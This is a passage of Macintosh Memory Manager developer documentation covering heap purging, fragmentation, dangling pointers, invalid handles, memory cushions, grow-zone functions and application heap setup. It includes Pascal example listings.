When allocating a new relocatable block, you can, if you want, manually reserve space for the block by calling the ReserveMem procedure. If you do not, the Memory Manager looks for space big enough for the block as low in the heap as possible, but it does not create space near the bottom of the heap for the block if there is already enough space higher in the heap.

Heap Purging and Compaction

When your application attempts to allocate memory (for example, by calling either the NewPtr or NewHandle function), the Memory Manager might need to compact or purge the heap to free memory and to fuse many small free blocks into fewer large free blocks. The Memory Manager first tries to obtain the requested amount of space by compacting the heap; if compaction fails to free the required amount of space, the Memory Manager then purges the heap.

When compacting the heap, the Memory Manager moves unlocked, relocatable blocks down until they reach nonrelocatable blocks or locked, relocatable blocks. You can compact the heap manually, by calling either the CompactMem function or the MaxMem function.

In a purge of the heap, the Memory Manager sequentially purges unlocked, purgeable relocatable blocks until it has freed enough memory or until it has purged all such blocks. It purges a block by deallocating it and setting its master pointer to NIL. If you want, you can manually purge a few blocks or an entire heap in anticipation of a memory shortage. To purge an individual block manually, call the EmptyHandle procedure. To purge your entire heap manually, call the PurgeMem procedure or the MaxMem function.
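A brief sketch of these manual operations follows; the byte count is an arbitrary assumption for the example.

PROCEDURE DoFreeSomeSpace;
CONST
   kBytesNeeded = 20 * 1024;                   {arbitrary illustrative request}
VAR
   largestBlock: Size;
BEGIN
   largestBlock := CompactMem(kBytesNeeded);   {compact until a block this large exists}
   IF largestBlock < kBytesNeeded THEN
      PurgeMem(kBytesNeeded);                  {purge purgeable blocks to free the rest}
END;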

Heap Fragmentation

Heap fragmentation can slow your application by forcing the Memory Manager to compact or purge your heap to satisfy a memory-allocation request. In the worst cases, when your heap is severely fragmented by locked or nonrelocatable blocks, it might be impossible for the Memory Manager to find the requested amount of contiguous free space, even though that much space is actually free in your heap. This can have disastrous consequences for your application: if the Memory Manager cannot find enough room to load a required code segment, your application will crash.

Obviously, it is best to minimize the amount of fragmentation that occurs in your application heap. It might be tempting to think that because the Memory Manager controls the movement of blocks in the heap, there is little that you can do to prevent heap fragmentation. In reality, however, fragmentation does not strike your application's heap by chance. Once you understand the major causes of heap fragmentation, you can follow a few simple rules to minimize it.

The primary causes of heap fragmentation are indiscriminate use of nonrelocatable blocks and indiscriminate locking of relocatable blocks. Each of these creates immovable blocks in your heap, thus creating "roadblocks" for the Memory Manager when it rearranges the heap to maximize the amount of contiguous free space. You can significantly reduce heap fragmentation simply by exercising care when you allocate nonrelocatable blocks and when you lock relocatable blocks.

Throughout this section, you should keep in mind the following rule: the Memory Manager can move a relocatable block around a nonrelocatable block (or a locked relocatable block) at these times only:
• When the Memory Manager reserves memory for a nonrelocatable block (or when you manually reserve memory before allocating a block), it can move unlocked, relocatable blocks upward over nonrelocatable blocks to make room for the new block as low in the heap as possible.
• When you attempt to resize a relocatable block, the Memory Manager can move that block around other blocks if necessary.

In contrast, the Memory Manager cannot move relocatable blocks over nonrelocatable blocks during compaction of the heap.

Deallocating Nonrelocatable Blocks

One of the most common causes of heap fragmentation is also one of the most difficult to avoid. The problem occurs when you dispose of a nonrelocatable block in the middle of the pile of nonrelocatable blocks at the bottom of the heap. Unless you immediately allocate another nonrelocatable block of the same size, you create a gap where the nonrelocatable block used to be.

It would not matter if the first block you allocated after deleting the nonrelocatable block were relocatable. The Memory Manager would place the block in the gap if possible. If you were later to allocate a nonrelocatable block as large as or smaller than the gap, the new block would take the place of the relocatable block, which would join other relocatable blocks in the middle of the heap, as desired.

However, unless the next nonrelocatable block you allocate happens to be the same size as the disposed block, the new nonrelocatable block might be smaller than the original nonrelocatable block, leaving a small gap. If you later allocate a slightly smaller, nonrelocatable block, that gap shrinks. Even so, small gaps are inefficient because of the small likelihood that future memory allocations will create blocks small enough to occupy the gaps. Whenever you dispose of a nonrelocatable block that you have allocated, you create small gaps. These small gaps can lead to heavy fragmentation over the course of your application's execution. Thus, you should try to avoid disposing of and then reallocating nonrelocatable blocks during program execution.

Reserving Memory

Another cause of heap fragmentation ironically occurs because of a limitation of memory reservation, a process designed to prevent it. The Memory Manager uses memory reservation to create space for nonrelocatable blocks as low as possible in the heap. (You can also manually reserve memory for relocatable blocks, but you rarely need to do so.) Occasionally, however, memory reservation can cause fragmentation, either when it succeeds but leaves small gaps in the reserved space, or when it fails and causes a nonrelocatable block to be allocated in the middle of the heap.

Ordinarily, when the Memory Manager moves a block up during memory reservation, that block cannot overlap its previous location. As a result, the Memory Manager might need to move the relocatable block up more than is necessary to contain the new nonrelocatable block, thereby creating a gap between the top of the new block and the bottom of the relocated block.

Memory reservation can also fragment the heap if there is not enough space in the heap to move the relocatable block up. In this case, the Memory Manager allocates the new nonrelocatable block above the relocatable block. The relocatable block cannot then move over the nonrelocatable block, except during the times described previously. However, memory reservation ensures that allocating nonrelocatable blocks in the middle of your application's execution causes no problems, and it never makes fragmentation worse than it would be if there were no memory reservation.

Locking Relocatable Blocks

Locked relocatable blocks present a special problem. When relocatable blocks are locked, they can cause as much heap fragmentation as nonrelocatable blocks. One solution is to reserve memory for all relocatable blocks that might at some point need to be locked, and to leave them locked for as long as they are allocated. This solution has drawbacks, however, because then the blocks would lose any flexibility that being relocatable otherwise gives them. Deleting a locked relocatable block can create a gap, just as deleting a nonrelocatable block can.

An alternative partial solution is to move relocatable blocks to the top of the heap before locking them. The MoveHHi procedure allows you to move a relocatable block upward until it reaches the top of the heap, a nonrelocatable block, or a locked relocatable block. The principal idea behind moving relocatable blocks to the top of the heap and locking them there is to keep the contiguous free space as large as possible.

This has the effect of partitioning the heap into four areas, as illustrated in Figure 1-12. At the bottom of the heap are the nonrelocatable blocks. Above those blocks are the unlocked relocatable blocks. At the top of the heap are locked relocatable blocks. Between the locked relocatable blocks and the unlocked relocatable blocks is an area of free space.

Figure 1-12 An effectively partitioned heap

Using MoveHHi is, however, not always a perfect solution to handling relocatable blocks that need to be locked. The MoveHHi procedure moves a block upward only until it reaches either a nonrelocatable block or a locked relocatable block. Unlike NewPtr and ReserveMem, MoveHHi does not currently move a relocatable block around one that is not relocatable.

Even if MoveHHi succeeds in moving a block to the top area of the heap, unlocking or deleting locked blocks can cause fragmentation if you don't unlock or delete those blocks in order, beginning with the lowest locked block. A relocatable block that is locked at the top area of the heap for a long period of time could trap other relocatable blocks that were locked for short periods of time but then unlocked.

This suggests that you need to treat relocatable blocks locked for a long period of time differently from those locked for a short period of time. If you plan to lock a relocatable block for a long period of time, you should reserve memory for it at the bottom of the heap before allocating it, then lock it for the duration of your application's execution (or as long as the block remains allocated). Do not reserve memory for relocatable blocks you plan to allocate for only short periods of time. Instead, move them to the top of the heap (by calling MoveHHi) and then lock them.

After you lock relocatable blocks temporarily, you don't need to move them manually back into the middle area when you unlock them. Whenever the Memory Manager compacts the heap or moves another relocatable block to the top heap area, it brings all unlocked relocatable blocks at the bottom of that partition back into the middle area.

In practice, you apply the same rules to relocatable blocks that you reserve space for and leave permanently locked as you apply to nonrelocatable blocks: Try not to allocate such blocks in the middle of your application's execution, and don't dispose of and reallocate such blocks in the middle of your application's execution.
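In code, the two locking disciplines might be sketched as follows; the constant, the global, and the parameter names are hypothetical.

CONST
   kTableSize = 8 * 1024;            {hypothetical long-lived table}
VAR
   gTable: Handle;

PROCEDURE DoLockingDisciplines (shortLived: Handle);
BEGIN
   {Long-term: reserve space low in the heap, allocate, and lock once at startup.}
   ReserveMem(kTableSize);
   gTable := NewHandle(kTableSize);
   IF gTable <> NIL THEN
      HLock(gTable);

   {Short-term: move the block high and lock it only around the unsafe calls.}
   MoveHHi(shortLived);
   HLock(shortLived);
   {... read or write the block's data here ...}
   HUnlock(shortLived);
END;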

Allocating Nonrelocatable Blocks

As you have seen, memory reservation is an imperfect process. In practice, there are two reasons for not allocating nonrelocatable blocks during the middle of your application's execution. First, if you also dispose of nonrelocatable blocks in the middle of your application's execution, then allocation of new nonrelocatable blocks is likely to create small gaps. Second, even if you never dispose of nonrelocatable blocks until your application terminates, the Memory Manager could occasionally place new nonrelocatable blocks above relocatable blocks.

There is, however, an exception to the rule that you should not allocate nonrelocatable blocks in the middle of your application's execution. Sometimes you need to allocate a nonrelocatable block only temporarily. If between the times that you allocate and dispose of a nonrelocatable block, you allocate no additional nonrelocatable blocks and do not attempt to compact the heap, then you have done no harm. The temporary block cannot create a new gap because the Memory Manager places no other block over the temporary block.

Summary of Preventing Fragmentation

Avoiding heap fragmentation is not difficult. It simply requires that you follow a few rules as closely as possible. Remember that allocation of even a small nonrelocatable block in the middle of your heap can ruin a scheme to prevent fragmentation of the heap, because the Memory Manager does not move relocatable blocks around nonrelocatable blocks when you call MoveHHi or when it attempts to compact the heap. If you adhere to the following rules, you are likely to avoid significant heap fragmentation:

• At the beginning of your application's execution, call the MaxApplZone procedure once and the MoreMasters procedure enough times so that the Memory Manager never needs to call it for you.
• Try to anticipate the maximum number of nonrelocatable blocks you will need and allocate them at the beginning of your application's execution.
• Avoid disposing of and then reallocating nonrelocatable blocks during your application's execution.
• When allocating relocatable blocks that you need to lock for long periods of time, use the ReserveMem procedure to reserve memory for them as close to the bottom of the heap as possible, and lock the blocks immediately after allocating them.
• If you plan to lock a relocatable block for a short period of time and allocate nonrelocatable blocks while it is locked, use the MoveHHi procedure to move the block to the top of the heap and then lock it. When the block no longer needs to be locked, unlock it.

Remember that you need to lock a relocatable block only if you call a routine that could move or purge memory and you then use a dereferenced handle to the relocatable block, or if you want to use a dereferenced handle to the relocatable block at interrupt time.

Perhaps the most difficult restriction is to avoid disposing of and then reallocating nonrelocatable blocks in the middle of your application's execution. Some Toolbox routines require you to use nonrelocatable blocks, and it is not always easy to anticipate how many such blocks you will need. If you must allocate and dispose of blocks in the middle of your program's execution, you might want to place used blocks into a linked list of free blocks instead of disposing of them, as in the sketch that follows. If you know how many nonrelocatable blocks of a certain size your application is likely to need, you can add that many to the beginning of the list at the beginning of your application's execution. If you need a nonrelocatable block later, you can check the linked list for a block of the exact size instead of simply calling the NewPtr function.
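Here is one hedged sketch of such a free list for nonrelocatable blocks of a single, fixed size; storing the link in the first 4 bytes of each free block is an assumption of this example, not anything the Memory Manager requires.

TYPE
   PtrPtr = ^Ptr;                    {view the first 4 bytes of a block as a link}
CONST
   kBlockSize = 256;                 {hypothetical fixed size for pooled blocks}
VAR
   gFreeList: Ptr;                   {head of the list; initialize to NIL at startup}

FUNCTION MyAllocBlock: Ptr;          {reuse a recycled block when one is available}
BEGIN
   IF gFreeList <> NIL THEN
   BEGIN
      MyAllocBlock := gFreeList;
      gFreeList := PtrPtr(gFreeList)^
   END
   ELSE
      MyAllocBlock := NewPtr(kBlockSize);
END;

PROCEDURE MyFreeBlock (p: Ptr);      {recycle the block instead of calling DisposePtr}
BEGIN
   PtrPtr(p)^ := gFreeList;
   gFreeList := p;
END;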

Dangling Pointers

Accessing a relocatable block by double indirection, through its handle instead of through its master pointer, requires an extra memory reference. For efficiency, you might sometimes want to dereference the handle--that is, make a copy of the block's master pointer--and then use that pointer to access the block by single indirection. When you do this, you need to be particularly careful. Any operation that allocates space from the heap might cause the relocatable block to be moved or purged. In that event, your copy of the master pointer is a dangling pointer.

Dangling pointers are likely to make your application crash or produce garbled output. Unfortunately, it is often easy during debugging to overlook situations that could leave pointers dangling, because pointers dangle only if the relocatable blocks that they reference actually move. Routines that can move or purge memory do not necessarily do so unless memory space is tight. If you improperly dereference a handle in a section of code, that code might still work properly most of the time. If, however, a dangling pointer does cause errors, they can be very difficult to trace. This section describes a number of situations that can cause dangling pointers and suggests some ways to avoid them.

The easiest way to prevent dangling pointers is simply to lock the relocatable block whose data you want to read or write. Because the block is locked and cannot move, the master pointer is guaranteed always to point to the beginning of the block's data. Listing 1-1 illustrates one way to avoid dangling pointers by locking a relocatable block.

Listing 1-1. Locking a block to avoid dangling pointers

VAR
   origState: SignedByte;                     {original attributes of handle}

origState := HGetState(Handle(myData));       {get handle attributes}
MoveHHi(Handle(myData));                      {move the handle high}
HLock(Handle(myData));                        {lock the handle}
WITH myData^^ DO                              {fill in window data}
BEGIN
   editRec := TENew(gDestRect, gViewRect);
   vScroll := GetNewControl(rVScroll, myWindow);
   hScroll := GetNewControl(rHScroll, myWindow);
   fileRefNum := 0;
   windowDirty := FALSE;
END;
HSetState(Handle(myData), origState);         {reset handle attributes}

Compiler Dereferencing

Some of the most difficult dangling pointers to isolate are not caused by any explicit dereferencing on your part, but by implicit dereferencing on the part of the compiler. For example, suppose you use a handle called myHandle to access the fields of a record in a relocatable block. You might use Pascal's WITH statement to do so, as follows:

WITH myHandle^^ DO
BEGIN
   ...
END;

A compiler is likely to dereference myHandle so that it can access the fields of the record without double indirection. However, if the code between the BEGIN and END statements causes the Memory Manager to move or purge memory, you are likely to end up with a dangling pointer.

In Listing 1-1, the handle myData needs to be locked before the WITH statement because the functions TENew and GetNewControl allocate memory and hence might move the block whose handle is myData.

Note that in Listing 1-1 the handle myData is never explicitly unlocked. Instead, the original attributes of the handle are saved by calling HGetState and later are restored by calling HSetState. This strategy is preferable to just calling HLock and HUnlock.

You should be careful to lock blocks only when necessary, because locked relocatable blocks can increase heap fragmentation and slow down your application unnecessarily. You should lock a handle only if you dereference it and then use a copy of the original master pointer after calling a routine that could move or purge memory. When you no longer need to reference the block with the master pointer, you should unlock the handle.

A compiler can generate hidden dereferencing, and hence potential dangling pointers, in other ways, for instance, by assigning the result of a function that might move or purge blocks to a field in a record referenced by a handle. For example, you might use this code to allocate a new element of a linked list:

myHandle^^.nextHandle := NewHandle(sizeof(myLinkedElement));

This can cause problems because your compiler could dereference myHandle before calling NewHandle. Therefore, you should either lock myHandle before performing the allocation, or use a temporary variable to allocate the new handle, as in the following code:

tempHandle := NewHandle(sizeof(myLinkedElement));
myHandle^^.nextHandle := tempHandle;

Such problems are particularly common in code that manipulates linked data structures.

Passing fields of records as arguments to routines that might move or purge memory can cause similar problems, if the records are in relocatable blocks referred to with handles. Problems arise only when you pass a field by reference rather than by value. Pascal conventions call for all arguments larger than 4 bytes to be passed by reference. In Pascal, a variable is also passed by reference when the routine called requests a variable parameter. Both of the following lines of code could leave a pointer dangling:

TEUpdate(hTE^^.viewRect, hTE);
InvalRect(theControl^^.contrlRect);
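A common remedy is to copy the field into a local variable and pass the copy, so that no reference into a movable block is held across the call; the sketch below does this for both calls, and myRect is a local introduced only for illustration.

PROCEDURE DoSafeUpdates (hTE: TEHandle; theControl: ControlHandle);
VAR
   myRect: Rect;
BEGIN
   myRect := hTE^^.viewRect;          {copy the field by value before the call}
   TEUpdate(myRect, hTE);

   myRect := theControl^^.contrlRect;
   InvalRect(myRect);
END;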

These problems occur because a compiler may dereference a handle before calling the routine to which you pass the handle. Then, that routine may move memory before it uses the dereferenced handle, which might then be invalid. As before, you can solve these problems by locking the handles or using temporary variables.

You need to be careful even when passing a field in a record referenced by a handle to a routine in the same code segment as the caller, or when assigning the result of a function in the same code segment to such a field. If that routine could call a Toolbox routine that might move or purge memory, or call a routine in a different, nonresident code segment, then you could indirectly cause a pointer to dangle.

Loading Code Segments

If you call an application-defined routine located in a code segment that is not currently in RAM, the Segment Manager might need to move memory when loading that code segment, thus jeopardizing any dereferenced handles you might be using. For example, suppose you call an application-defined procedure ManipulateData, which manipulates some data at an address passed to it in a variable parameter.

PROCEDURE MyRoutine;
BEGIN
   ...
   ManipulateData(myHandle^);
   ...
END;

You can create a dangling pointer if ManipulateData and MyRoutine are in different segments, and the segment containing ManipulateData is not loaded when MyRoutine is executed. You can do this because you've passed a dereferenced copy of myHandle as an argument to ManipulateData. If the Segment Manager must allocate a new relocatable block for the segment containing ManipulateData, it might move myHandle to do so. If so, the dereferenced handle would dangle. A similar problem can occur if you assign the result of a function in a nonresident code segment to a field in a record referred to by a handle.

Callback Routines

Code segmentation can also lead to a different type of dangling-pointer problem when you use callback routines. Some Toolbox routines require that you pass a pointer to a procedure in a variable of type ProcPtr. Ordinarily, it does not matter whether the procedure you pass in such a variable is in the same code segment as the routine that calls it or in a different code segment. For example, suppose you call TrackControl as follows:

myPart := TrackControl(myControl, myEvent.where, @MyCallBack);

If MyCallBack were in the same code segment as this line of code, then a compiler would pass to TrackControl the absolute address of the MyCallBack procedure. If it were in a different code segment, then the compiler would take the address from the jump table entry for MyCallBack. Either way, TrackControl should call MyCallBack correctly. The problem rarely arises, but it is difficult to debug.

Occasionally, however, you might use a variable of type ProcPtr to hold the address of a callback procedure and then pass that address to a routine. Here is an example:

myProc := @MyCallBack;
...
myPart := TrackControl(myControl, myEvent.where, myProc);

Suppose, in this hypothetical situation, that the MyCallBack procedure is in the same segment as the first line of the code, and the first line of the code is in a different segment from the call to TrackControl. Suppose, further, that myProc is a global variable. Then the compiler might place the absolute address of the MyCallBack routine into the variable myProc. Because MyCallBack and the call to TrackControl are in different code segments, the TrackControl procedure requires that you pass an address in the jump table, not an absolute address. Thus, myProc would reference MyCallBack incorrectly.

As long as these lines of code are in the same code segment and the segment is not unloaded between the execution of those lines, the preceding code should work perfectly. The compiler cannot realize that you plan to use the variable in a different code segment from the one that holds both the routine you are referencing and the routine you are using to initialize the myProc variable. To avoid this problem, make sure to place in the same segment any code in which you assign a value to a variable of type ProcPtr and any code in which you use that variable. If you must put them in different code segments, then be sure that you place the callback routine in a code segment different from the one that initializes the variable.

Invalid Handles

An invalid handle refers to the wrong area of memory, just as a dangling pointer does. There are three types of invalid handles: empty handles, disposed handles, and fake handles. You must avoid empty, disposed, or fake handles as carefully as dangling pointers. Fortunately, it is generally easier to detect, and thus to avoid, invalid handles.

Disposed Handles: A disposed handle is a handle whose associated relocatable block has been disposed of. When you dispose of a relocatable block (perhaps by calling the procedure DisposeHandle), the Memory Manager does not change the value of any handle variables that previously referenced that block. Instead, those variables still hold the address of what once was the relocatable block's master pointer. Because the block has been disposed of, the contents of the master pointer are no longer defined. (The master pointer might belong to a subsequently allocated relocatable block, or it could become part of a linked list of unused master pointers maintained by the Memory Manager.)

If you accidentally use a handle to a block you have already disposed of, you can obtain unexpected results. In the best cases, your application will crash. In the worst cases, you will get garbled data. It might, however, be difficult to trace the cause of the garbled data, because your application can continue to run for quite a while before the problem begins to manifest itself.

You can avoid these problems quite easily by assigning the value NIL to the handle variable after you dispose of its associated block. By doing so, you indicate that the handle does not point anywhere in particular. If you subsequently attempt to operate on such a block, the Memory Manager will probably generate a nilHandleErr result code. If you want to make certain that a handle is not disposed of before operating on a relocatable block, you can test whether the value of the handle is NIL, as follows:

IF myHandle <> NIL THEN
   ...                              {handle is valid, so we can operate on it here}

Empty Handles: An empty handle is a handle whose master pointer has the value NIL. When the Memory Manager purges a relocatable block, for example, it sets the block's master pointer to NIL. The space occupied by the master pointer itself remains allocated, and handles to the purged block continue to point to the master pointer. This is useful, because if you later reallocate space for the block by calling ReallocateHandle, the master pointer will be updated and all existing handles will correctly access the reallocated block.

However, inadvertently using an empty handle can give unexpected results or lead to a system crash. If you doubly dereference an empty handle, you reference whatever data is found at that location. In the Macintosh Operating System, NIL technically refers to memory location 0. But this memory location holds a value, and you could obtain unexpected results that are difficult to trace.

It is useful during debugging to set memory location 0 to an odd number, such as $50FFC001. This causes the Operating System to crash immediately if you attempt to dereference an empty handle. This is useful because you can immediately fix problems that might otherwise require extensive debugging.

You can check for empty handles much as you check for disposed handles. Assuming you set handles to NIL when you dispose of them, you can use the following code to determine whether a handle both points to a valid master pointer and references a nonempty relocatable block:

IF myHandle <> NIL THEN
   IF myHandle^ <> NIL THEN
      ...                           {we can operate on the relocatable block here}

Note that because Pascal evaluates expressions completely, you need two IF-THEN statements rather than one compound statement, in case the value of the handle itself is NIL. Most compilers, however, allow you to use "short-circuit" Boolean operators to minimize the evaluation of expressions. For example, if your compiler uses the operator & as a short-circuit operator for AND, the second expression is evaluated only if the first expression evaluates to TRUE. In this case, you could rewrite the preceding code like this:

IF (myHandle <> NIL) & (myHandle^ <> NIL) THEN
   ...                              {we can operate on the relocatable block here}

Fake Handles: A fake handle is a handle that was not created by the Memory Manager. Normally, you create handles by either directly or indirectly calling the Memory Manager function NewHandle (or one of its variants, such as NewHandleClear). You create a fake handle--usually inadvertently--by directly assigning a value to a variable of type Handle, as illustrated in Listing 1-2.

Listing 1-2. Creating a fake handle

FUNCTION MakeFakeHandle: Handle;    {DON'T USE THIS FUNCTION!}
CONST
   kMemoryLoc = $100;               {a random memory location}
VAR
   myHandle:  Handle;
   myPointer: Ptr;
BEGIN
   myPointer := Ptr(kMemoryLoc);    {the address of some memory}
   myHandle := @myPointer;          {the address of a pointer}
   MakeFakeHandle := myHandle;      {DON'T DO THIS!}
END;

Remember that a real handle contains the address of a master pointer. The fake handle manufactured by the function MakeFakeHandle in Listing 1-2 contains an address that may or may not be the address of a master pointer. If it isn't the address of a master pointer, then you virtually guarantee chaotic results if you pass the fake handle to a system software routine that expects a real handle.

For example, suppose you pass a fake handle to the MoveHHi procedure. After allocating a new relocatable block high in the heap, MoveHHi is likely to copy the data from the original block to the new block by dereferencing the handle and using, supposedly, a master pointer. Because the value of a fake handle probably isn't the address of a master pointer, MoveHHi copies invalid data. (Actually, it's unlikely that MoveHHi would ever get that far; probably it would run into problems when attempting to determine the size of the original block from the block header.)

Not all fake handles are as easy to spot as those created by the MakeFakeHandle function defined in Listing 1-2. You might, for instance, attempt to copy the data in an existing record (myRecord) into a new handle, as follows:

myHandle := NewHandle(SizeOf(myRecord));    {create a new handle}
myHandle^ := @myRecord;                     {DON'T DO THIS!}

The second line of code does not make myHandle a handle to the beginning of the myRecord record. Instead, it overwrites the master pointer with the address of that record, making myHandle a fake handle.

A correct way to create a new handle to some existing data is to make a copy of the data using the PtrToHand function, as follows:

myErr := PtrToHand(@myRecord, myHandle, SizeOf(myRecord));

The Memory Manager provides a set of pointer- and handle-manipulation routines that can help you avoid creating fake handles.

Low-Memory Conditions

It is particularly important to make sure that the amount of free space in your application heap never gets too low. As you have seen, you should never deplete the available heap memory to the point that it becomes impossible to load required code segments. Your application will crash if the Segment Manager is called to load a required code segment and there is not enough contiguous free memory to allocate a block of the appropriate size.

The execution of some system software routines requires significant amounts of memory in your heap. For example, some QuickDraw operations on regions can temporarily allocate fairly large amounts of space in your heap. Some of these system software routines, however, do little or no checking to see that your heap contains the required amount of free space. They either assume that they will get whatever memory they need or they simply issue a system error when they don't get the needed memory. In either case, the result is usually a system crash.

You can avoid these problems by making sure that there is always enough space in your heap to handle these hidden memory allocations. Experience has shown that 40 KB is a reasonably safe size for this memory cushion. If you can consistently maintain that amount of space free in your heap, you can be reasonably certain that system software routines will get the memory they need to operate. You also generally need a larger cushion (about 70 KB) when printing.

Before you attempt to allocate memory directly, you should check that, if the requested amount of memory were in fact allocated, the remaining amount of space free in the heap would not fall below a certain threshold. The free memory defined by that threshold is your memory cushion. You should not simply inspect the handle or pointer returned to you and make sure that its value isn't NIL, because you might have succeeded in allocating the space you requested but left the amount of free space dangerously low.

You also need to make sure that indirect memory allocation doesn't cut into the memory cushion. When, for example, you call GetNewDialog, the Dialog Manager might need to allocate space for a dialog record; it also needs to allocate heap space for the dialog item list and any other custom items in the dialog. Before calling GetNewDialog, therefore, you need to make sure that the amount of space left free after the call is greater than your memory cushion.

Memory Reserves

Unfortunately, there are times when you might need to use some of the memory in the cushion yourself. It is better, for example, to dip into the memory cushion to save a user's document than to reject the request to save the document. Some actions your application performs should not be rejectable simply because they require it to reduce the amount of free space below a desired minimum. Instead of relying on just the free memory of a memory cushion, you can allocate a memory reserve, some additional emergency storage that you release when free memory becomes low.

The important difference between this memory reserve and the memory cushion is that the memory reserve is a block of allocated memory, which you release whenever you detect that essential tasks have dipped into the memory cushion. Because you allow essential tasks to dip into the memory cushion, the release itself of the memory reserve should not be a cause for alarm. Using this scheme, your application releases the memory reserve as a precautionary measure during ordinary operation. Ideally, however, the application should never actually deplete the memory cushion and use the memory reserve. That emergency memory reserve might provide enough memory to compensate for any essential tasks that you fail to anticipate.

Grow-Zone Functions

The Memory Manager provides a particularly easy way for you to make sure that the emergency memory reserve is released when necessary. You can define a grow-zone function that is associated with your application heap. The Memory Manager calls your heap's grow-zone function only after other techniques of freeing memory to satisfy a memory request fail (that is, after compacting and purging the heap and extending the heap zone to its maximum size).

The grow-zone function can then take appropriate steps to free additional memory. A grow-zone function might dispose of some blocks or make some unpurgeable blocks purgeable. As the most drastic step to freeing memory in your heap, you can release the emergency reserve. When the function returns, the Memory Manager once again purges and compacts the heap and tries to reallocate memory. If there is still insufficient memory, the Memory Manager calls the grow-zone function again (but only if the function returned a nonzero value the previous time it was called). This mechanism allows your grow-zone function to release just a little bit of memory at a time. If the amount it releases at any time is not enough, the Memory Manager calls it again and gives it the opportunity to take more drastic measures.
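As a hedged illustration, here is a minimal grow-zone function that releases an emergency reserve. The global gEmergencyMemory, the constant kEmergencyMemorySize, and the initialization procedure are assumptions of this sketch; GZSaveHnd is the Memory Manager function that identifies a block the grow-zone function must not touch, and the & operator is assumed to short-circuit. A production version may also need to restore the application's A5 world, a detail omitted here.

CONST
   kEmergencyMemorySize = 40 * 1024;        {assumed size of the emergency reserve}
VAR
   gEmergencyMemory: Handle;                {assumed global holding the reserve}

FUNCTION MyGrowZone (cbNeeded: Size): LongInt;
BEGIN
   IF (gEmergencyMemory <> NIL) & (gEmergencyMemory^ <> NIL) &
      (gEmergencyMemory <> GZSaveHnd) THEN
   BEGIN
      EmptyHandle(gEmergencyMemory);        {free the reserve's space; handle stays valid}
      MyGrowZone := kEmergencyMemorySize    {report how many bytes were freed}
   END
   ELSE
      MyGrowZone := 0;                      {nothing left to release}
END;

PROCEDURE DoInitMemoryReserve;              {call once at application startup}
BEGIN
   gEmergencyMemory := NewHandle(kEmergencyMemorySize);
   SetGrowZone(@MyGrowZone);
END;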

Using Memory

This section describes how you can use the Memory Manager to perform the most typical memory management tasks. In particular, this section shows how you can
• set up your application heap at application launch time
• determine how much free space is available in your application heap
• allocate and release blocks of memory in your heap
• define and install a grow-zone function

The techniques described in this section are designed to minimize fragmentation of your application heap and to ensure that your application always has sufficient memory to complete any essential operations.

Setting Up the Application Heap

When the Process Manager launches your application, it calls the Memory Manager to create and initialize a memory partition for your application. The Process Manager then loads code segments into memory and sets up the stack, heap, and A5 world (including the jump table) for your application.

To help prevent heap fragmentation, you should also perform some setup of your own early in your application's execution. Depending on the needs of your application, you might want to
• change the size of your application's stack
• expand the heap to the heap limit
• allocate additional master pointer blocks

The following sections describe in detail how and when to perform these operations.

Changing the Size of the Stack: Most applications allocate space on their stack in a predictable way and do not need to monitor stack space during their execution. For these applications, stack usage usually reaches a maximum in some heavily nested routine. If the stack in your application can never grow beyond a certain size, then to avoid collisions between your stack and heap you simply need to ensure that your stack is large enough to accommodate that size. If you never encounter system error 28 (generated by the stack sniffer when it detects a collision between the stack and the heap) during application testing, then you probably do not need to increase the size of your stack.

Some applications, however, rely heavily on recursive programming techniques, in which one routine repeatedly calls itself or a small group of routines repeatedly call each other. In these applications, even routines with just a few local variables can cause stack overflow, because each time a routine calls itself, a new copy of that routine's parameters and variables is appended to the stack. The problem can become particularly acute if one or more of the local variables is a string, which can require up to 256 bytes of stack space. In addition, some object-oriented languages (for example, C++) allocate space for objects on the stack. If you are using one of these languages, you might need to expand your stack.

You can help prevent your application from crashing because of insufficient stack space by expanding the size of your stack. If your application does not depend on recursion, you should do this only if you encounter system error 28 during testing. If your application does depend on recursion, you might consider expanding the stack so that your application can perform deeply nested recursive computations.

By default, the stack can grow to 8 KB on Macintosh computers without Color QuickDraw and to 32 KB on computers with Color QuickDraw. (The size of the stack for a faceless background process is always 8 KB, whether Color QuickDraw is present or not.) There is no maximum size to which the stack can grow.

To increase the size of your stack, you simply reduce the size of your heap. Because the heap cannot grow above the boundary contained in the ApplLimit global variable, you can lower the value of ApplLimit to limit the heap's growth. By lowering ApplLimit, technically you are not making the stack bigger; you are just preventing collisions between it and the heap.

You should never decrease the size of the stack, because future versions of system software might increase the default amount of space allocated for the stack. For the same reason, you should not set the stack to a predetermined absolute size or calculate a new absolute size for the stack based on the microprocessor's type. If you must modify the size of the stack, you should increase the stack size only by some relative amount that is sufficient to meet the increased stack requirements of your application.

Listing 1-3 defines a procedure that increases the stack size by a given value. It does so by determining the current heap limit, subtracting the value of the extraBytes parameter from that value, and then setting the application limit to the difference.

Listing 1-3. Increasing the amount of space allocated for the stack

PROCEDURE IncreaseStackSize (extraBytes: Size);
BEGIN
   SetApplLimit(Ptr(ORD4(GetApplLimit) - extraBytes));
END;

You should call this procedure at the beginning of your application, before you call the MaxApplZone procedure (as described in the next section). If you call IncreaseStackSize after you call MaxApplZone, it has no effect, because the SetApplLimit procedure cannot change the ApplLimit global variable to a value lower than the current top of the heap.

Expanding the Heap: Near the beginning of your application's execution, before you allocate any memory, you should call the MaxApplZone procedure to expand the application heap immediately to the application heap limit. If you do not do this, the Memory Manager gradually expands your heap as memory needs require. This gradual expansion can result in significant heap fragmentation if you have previously moved relocatable blocks to the top of the heap (by calling MoveHHi) and locked them (by calling HLock). When the heap grows beyond those locked blocks, they are no longer at the top of the heap. Your heap then remains fragmented for as long as those blocks remain locked.

Another advantage to calling MaxApplZone is that doing so is likely to reduce the number of relocatable blocks that are purged by the Memory Manager. The Memory Manager expands your heap to fulfill a memory request only after it has exhausted other methods of obtaining the required amount of space, including compacting the heap and purging blocks marked as purgeable. By expanding the heap to its limit, you can prevent the Memory Manager from purging blocks that it otherwise would purge. This, together with the fact that your heap is expanded only once, can make memory allocation significantly faster.

Allocating Master Pointer Blocks: After calling MaxApplZone, you should call the MoreMasters procedure to allocate as many new nonrelocatable blocks of master pointers as your application is likely to need during its execution. Each block of master pointers in your application heap contains 64 master pointers. The Operating System allocates one block of master pointers as your application is loaded into memory, and every relocatable block you allocate needs one master pointer to reference it.

